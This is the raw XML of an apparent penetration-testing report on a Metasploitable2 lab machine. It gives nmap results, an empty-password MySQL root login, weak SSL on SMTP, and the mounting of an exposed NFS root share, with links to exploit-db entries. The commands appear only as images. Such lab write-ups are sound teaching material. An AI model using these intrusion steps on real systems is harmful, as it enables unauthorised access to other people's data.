                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3415030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DE5597" w14:textId="3163E793" w:rsidR="00546163" w:rsidRDefault="00546163" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00546163">
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B7C26D" wp14:editId="1C00C9FB">
            <wp:extent cx="5731510" cy="3457575"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="20343992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9204" name="Picture 1" descr="A computer screen shot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId113"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3457575"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="128E646A" w14:textId="7C18F29A" w:rsidR="00263A66" w:rsidRDefault="00263A66" w:rsidP="00501528">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2E44CD" w14:textId="09076B62" w:rsidR="007668BF" w:rsidRDefault="007668BF" w:rsidP="00F056A1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc155118320"/>
      <w:r>
        <w:t>Port 3306 MySql</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="4CF1B956" w14:textId="52B2C0A4" w:rsidR="00181A83" w:rsidRDefault="00181A83" w:rsidP="00181A83">
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784068D5" w14:textId="77777777" w:rsidR="00181A83" w:rsidRDefault="00181A83" w:rsidP="00181A83">
      <w:r>
        <w:t>3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A02ABDD" w14:textId="77777777" w:rsidR="00181A83" w:rsidRDefault="00181A83" w:rsidP="00181A83">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">| mysql-info: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Some Capabilities: LongColumnFlag, Speaks41ProtocolNew, SupportsTransactions, Support41Auth, SwitchToSSLAfterHandshake, ConnectWithDatabase, SupportsCompression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0F51E4" w14:textId="77777777" w:rsidR="00181A83" w:rsidRDefault="00181A83" w:rsidP="00181A83">
      <w:r>
        <w:t>|   Status: Autocommit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C550B4" w14:textId="77777777" w:rsidR="00181A83" w:rsidRDefault="00181A83" w:rsidP="00181A83">
      <w:r>
        <w:t>|_  Salt: R-+-A&gt;Q_ipx*d:45K[i~</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B32D351" w14:textId="25989FB0" w:rsidR="00231879" w:rsidRDefault="00231879" w:rsidP="00231879">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>It was possible to login into the remote MySQL as root using weak credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DA474F" w14:textId="4FAE525C" w:rsidR="00231879" w:rsidRDefault="00F605F9" w:rsidP="00231879">
      <w:r w:rsidRPr="00F605F9">
        <w:t>It was possible to login as root with an empty password</w:t>
      </w:r>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CVE-2016-6531</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C47F267" w14:textId="57188D5D" w:rsidR="00AA4582" w:rsidRDefault="00AA4582" w:rsidP="00AA4582">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F56" w:hAnsi="F56" w:cs="F56"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cve: CVE-2018-15719</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641BD93F" w14:textId="10BD0398" w:rsidR="00F056A1" w:rsidRDefault="00F056A1" w:rsidP="00F056A1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc155118321"/>
      <w:r>
        <w:t>Port 25</w:t>
      </w:r>
      <w:r w:rsidR="005B1C9C">
        <w:t xml:space="preserve"> SMTP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="6964C836" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A61C224" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>|_ssl-date: 2024-01-02T09:58:53+00:00; +1s from scanner time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361C8F3" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0967055F" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>| Not valid before: 2010-03-17T14:07:45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5045C0FD" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>|_Not valid after:  2010-04-16T14:07:45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F097B96" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t xml:space="preserve">| sslv2: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D6DC85" w14:textId="77777777" w:rsidR="003E7196" w:rsidRDefault="003E7196" w:rsidP="003E7196">
      <w:r>
        <w:t>|   SSLv2 supported</w:t>
      </w:r>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lastRenderedPageBreak/>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TLS session to 512-bit export-grade cryptography, which is signi_cantly weaker, allowing the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657D897F" w14:textId="32DB3C51" w:rsidR="00A2599A" w:rsidRDefault="00A2599A" w:rsidP="00A2599A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="F37" w:hAnsi="F37" w:cs="F37"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>attacker to more easily break the encryption and monitor or tamper with the encrypted stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6667C1D3" w14:textId="135C1A69" w:rsidR="002873B8" w:rsidRDefault="004C2BDA" w:rsidP="002873B8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc155118322"/>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00933B9C">
        <w:t>ort</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2049 </w:t>
      </w:r>
      <w:r w:rsidR="002873B8">
        <w:t>Showmount to expose Root Share</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="52620DD6" w14:textId="77777777" w:rsidR="002873B8" w:rsidRPr="002873B8" w:rsidRDefault="002873B8" w:rsidP="002873B8"/>
    <w:p w14:paraId="18970012" w14:textId="3ACB5ADA" w:rsidR="002873B8" w:rsidRDefault="002873B8" w:rsidP="002873B8">
      <w:r w:rsidRPr="002873B8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BB51726" wp14:editId="3D45D363">
            <wp:extent cx="2943636" cy="828791"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1121888710"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8710" name="Picture 1" descr="A computer screen shot of numbers and symbols&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId114"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2943636" cy="828791"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1E20B7" w14:textId="1ED6A74D" w:rsidR="002873B8" w:rsidRDefault="002873B8" w:rsidP="002873B8">
      <w:r>
        <w:t xml:space="preserve">That looks like that’s shared. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5541B335" w14:textId="23EE5D94" w:rsidR="002873B8" w:rsidRDefault="002873B8" w:rsidP="002873B8">
      <w:r>
        <w:t xml:space="preserve">Create a directory </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB5044D" w14:textId="7B9B216F" w:rsidR="002873B8" w:rsidRDefault="002873B8" w:rsidP="002873B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01965511" wp14:editId="0F1D8C46">
            <wp:extent cx="2286635" cy="504825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="738167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635" cy="504825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FBBE97" w14:textId="72FB3C9A" w:rsidR="002873B8" w:rsidRDefault="00E417E5" w:rsidP="002873B8">
      <w:r>
        <w:t>Lets now mount it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2394AA6A" w14:textId="4D7E388C" w:rsidR="002873B8" w:rsidRDefault="00E417E5" w:rsidP="002873B8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66DCF827" wp14:editId="32C86959">
            <wp:extent cx="4677410" cy="676275"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="1114579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77410" cy="676275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F3CEBF" w14:textId="315A4BC1" w:rsidR="00E417E5" w:rsidRDefault="00E417E5" w:rsidP="002873B8">
      <w:r>
        <w:t>Err guys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FDA312" w14:textId="628F7E1B" w:rsidR="00E417E5" w:rsidRDefault="00E417E5" w:rsidP="002873B8">
      <w:r>
        <w:t>Not a single username\password was asked was able to walk straight in and go to any where</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC3404C" w14:textId="433912A9" w:rsidR="00E417E5" w:rsidRDefault="00E417E5" w:rsidP="002873B8">
      <w:r w:rsidRPr="00E417E5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F8DA8EB" wp14:editId="6988A4F7">
            <wp:extent cx="5731510" cy="3213735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="190551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0897" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId117"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3213735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44406AE8" w14:textId="77777777" w:rsidR="00E417E5" w:rsidRDefault="00E417E5" w:rsidP="002873B8"/>
    <w:p w14:paraId="082275DF" w14:textId="35E5ABB9" w:rsidR="00E417E5" w:rsidRPr="002873B8" w:rsidRDefault="00E417E5" w:rsidP="002873B8"/>
    <w:sectPr w:rsidR="00E417E5" w:rsidRPr="00287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50E8D"/>
    <w:rsid w:val="000520F2"/>
    <w:rsid w:val="0005303B"/>
    <w:rsid w:val="00053765"/>
    <w:rsid w:val="00062B58"/>
    <w:rsid w:val="000828E0"/>
    <w:rsid w:val="00084769"/>
    <w:rsid w:val="00085E35"/>
    <w:rsid w:val="00096473"/>
    <w:rsid w:val="000A0996"/>
    <w:rsid w:val="000E75D2"/>
    <w:rsid w:val="000F091D"/>
    <w:rsid w:val="000F3B37"/>
    <w:rsid w:val="00101BC7"/>
    <w:rsid w:val="0011222E"/>
    <w:rsid w:val="001124F8"/>
    <w:rsid w:val="00115C0E"/>
    <w:rsid w:val="00123352"/>
    <w:rsid w:val="0012652E"/>
    <w:rsid w:val="00137E89"/>
    <w:rsid w:val="00140FA3"/>
    <w:rsid w:val="001419EA"/>
    <w:rsid w:val="00142AB4"/>
    <w:rsid w:val="0014407D"/>
    <w:rsid w:val="001563F3"/>
    <w:rsid w:val="00161AFF"/>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3A66"/>
    <w:rsid w:val="00266BE8"/>
    <w:rsid w:val="002678B2"/>
    <w:rsid w:val="00271199"/>
    <w:rsid w:val="002873B8"/>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A3D15"/>
    <w:rsid w:val="003B002E"/>
    <w:rsid w:val="003B2623"/>
    <w:rsid w:val="003B5EC8"/>
    <w:rsid w:val="003C24C7"/>
    <w:rsid w:val="003E2586"/>
    <w:rsid w:val="003E6FBA"/>
    <w:rsid w:val="003E7196"/>
    <w:rsid w:val="0040583D"/>
    <w:rsid w:val="00405ED6"/>
    <w:rsid w:val="00411220"/>
    <w:rsid w:val="00426120"/>
    <w:rsid w:val="00433EE2"/>
    <w:rsid w:val="004417A4"/>
    <w:rsid w:val="00460C48"/>
    <w:rsid w:val="00461B33"/>
    <w:rsid w:val="004872DF"/>
    <w:rsid w:val="00492F17"/>
    <w:rsid w:val="00495A6A"/>
    <w:rsid w:val="004A284B"/>
    <w:rsid w:val="004A3182"/>
    <w:rsid w:val="004B0430"/>
    <w:rsid w:val="004B637A"/>
    <w:rsid w:val="004C2BDA"/>
    <w:rsid w:val="004D025B"/>
    <w:rsid w:val="004D332E"/>
    <w:rsid w:val="004D374B"/>
    <w:rsid w:val="004E0623"/>
    <w:rsid w:val="004E6E8E"/>
    <w:rsid w:val="00501528"/>
    <w:rsid w:val="005017F8"/>
    <w:rsid w:val="00511F27"/>
    <w:rsid w:val="0052288E"/>
    <w:rsid w:val="005231AC"/>
    <w:rsid w:val="005277C9"/>
    <w:rsid w:val="0053065B"/>
    <w:rsid w:val="00531359"/>
    <w:rsid w:val="00545F98"/>
    <w:rsid w:val="00546163"/>
    <w:rsid w:val="005725A9"/>
    <w:rsid w:val="0057637D"/>
    <w:rsid w:val="00577E82"/>
    <w:rsid w:val="00580FC9"/>
    <w:rsid w:val="005924DD"/>
    <w:rsid w:val="00594B23"/>
    <w:rsid w:val="005A6B1E"/>
    <w:rsid w:val="005A7850"/>
    <w:rsid w:val="005B1C9C"/>
    <w:rsid w:val="005B2E1D"/>
    <w:rsid w:val="005C50C3"/>
    <w:rsid w:val="005E0814"/>
    <w:rsid w:val="005F4C76"/>
    <w:rsid w:val="005F602F"/>
    <w:rsid w:val="00607B81"/>
    <w:rsid w:val="00620BAC"/>
    <w:rsid w:val="00622A22"/>
    <w:rsid w:val="00636FD3"/>
    <w:rsid w:val="00662104"/>
    <w:rsid w:val="006631BA"/>
    <w:rsid w:val="00665A54"/>
    <w:rsid w:val="006677D6"/>
    <w:rsid w:val="006706AD"/>
    <w:rsid w:val="00681735"/>
    <w:rsid w:val="00684BC6"/>
    <w:rsid w:val="0068754C"/>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27033"/>
    <w:rsid w:val="008314C5"/>
    <w:rsid w:val="00833660"/>
    <w:rsid w:val="00833738"/>
    <w:rsid w:val="00837F9F"/>
    <w:rsid w:val="00852076"/>
    <w:rsid w:val="008554BD"/>
    <w:rsid w:val="00856C90"/>
    <w:rsid w:val="00860812"/>
    <w:rsid w:val="0086149A"/>
    <w:rsid w:val="008745C5"/>
    <w:rsid w:val="0088687B"/>
    <w:rsid w:val="0089054D"/>
    <w:rsid w:val="0089426B"/>
    <w:rsid w:val="00894A1A"/>
    <w:rsid w:val="008A7F30"/>
    <w:rsid w:val="008B007E"/>
    <w:rsid w:val="008B6AC2"/>
    <w:rsid w:val="008B6BEB"/>
    <w:rsid w:val="008B708C"/>
    <w:rsid w:val="008C302A"/>
    <w:rsid w:val="008E1FB7"/>
    <w:rsid w:val="008E4971"/>
    <w:rsid w:val="008E51FC"/>
    <w:rsid w:val="008F653F"/>
    <w:rsid w:val="00902F3F"/>
    <w:rsid w:val="009337A3"/>
    <w:rsid w:val="009337DE"/>
    <w:rsid w:val="00933B9C"/>
    <w:rsid w:val="009530CB"/>
    <w:rsid w:val="00954F70"/>
    <w:rsid w:val="009664C3"/>
    <w:rsid w:val="00983F34"/>
    <w:rsid w:val="00994E96"/>
    <w:rsid w:val="009973A1"/>
    <w:rsid w:val="009A01E6"/>
    <w:rsid w:val="009A0D15"/>
    <w:rsid w:val="009A65C2"/>
    <w:rsid w:val="009B2A1F"/>
    <w:rsid w:val="009B4322"/>
    <w:rsid w:val="009D1027"/>
    <w:rsid w:val="009D555B"/>
    <w:rsid w:val="009E6717"/>
    <w:rsid w:val="009E78F3"/>
    <w:rsid w:val="009E7FFD"/>
    <w:rsid w:val="009F2B48"/>
    <w:rsid w:val="00A0433A"/>
    <w:rsid w:val="00A219A9"/>
    <w:rsid w:val="00A21FEE"/>
    <w:rsid w:val="00A2599A"/>
    <w:rsid w:val="00A25E5E"/>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115CF"/>
    <w:rsid w:val="00B15CC3"/>
    <w:rsid w:val="00B2433C"/>
    <w:rsid w:val="00B25B9B"/>
    <w:rsid w:val="00B323E0"/>
    <w:rsid w:val="00B33A9D"/>
    <w:rsid w:val="00B4294D"/>
    <w:rsid w:val="00B65EFC"/>
    <w:rsid w:val="00B67BAF"/>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1D13"/>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414BC"/>
    <w:rsid w:val="00D50252"/>
    <w:rsid w:val="00D70A3E"/>
    <w:rsid w:val="00D76D9B"/>
    <w:rsid w:val="00D77F85"/>
    <w:rsid w:val="00D80837"/>
    <w:rsid w:val="00D80D9B"/>
    <w:rsid w:val="00D81403"/>
    <w:rsid w:val="00D93810"/>
    <w:rsid w:val="00D93FF2"/>
    <w:rsid w:val="00D94CD0"/>
    <w:rsid w:val="00DA362E"/>
    <w:rsid w:val="00DB6252"/>
    <w:rsid w:val="00DC416D"/>
    <w:rsid w:val="00DC51D3"/>
    <w:rsid w:val="00DD210A"/>
    <w:rsid w:val="00DF475F"/>
    <w:rsid w:val="00DF50CE"/>
    <w:rsid w:val="00DF55D0"/>
    <w:rsid w:val="00E01F34"/>
    <w:rsid w:val="00E03586"/>
    <w:rsid w:val="00E05828"/>
    <w:rsid w:val="00E10D2A"/>
    <w:rsid w:val="00E17435"/>
    <w:rsid w:val="00E20F61"/>
    <w:rsid w:val="00E40502"/>
    <w:rsid w:val="00E417E5"/>
    <w:rsid w:val="00E442FB"/>
    <w:rsid w:val="00E53903"/>
    <w:rsid w:val="00E54950"/>
    <w:rsid w:val="00E7387F"/>
    <w:rsid w:val="00E864BE"/>
    <w:rsid w:val="00EB0EB8"/>
    <w:rsid w:val="00EB3CAD"/>
    <w:rsid w:val="00EC191C"/>
    <w:rsid w:val="00EC3B63"/>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4695">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="402918387">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233512753">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1535850974">
          <w:blockQuote w:val="1"/>
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="150"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="single" w:sz="24" w:space="0" w:color="EDC64A"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="26763551">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518664345">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="488449024">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669218248">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="81179702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97">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2.png"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image67.jpg"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.pn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8.png"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5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5.jpeg"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image60.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0.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><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5.emf"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.254.182/local/exploit"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jpg"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.jpeg"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.jp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3.jpg"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hdm.io/tools/debian-openssl/" TargetMode="External"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.jp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png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.jp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hyperlink" Target="mailto:root@192.168.254.186" TargetMode="External"/><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hyperlink" Target="https://github.com/rich98/Metasploitable2" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.jpeg"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/8572" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image81.jp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jp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52</Pages>
  <Words>4097</Words>
  <Characters>28051</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>967</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31</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-02T13:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-03T10:46:00Z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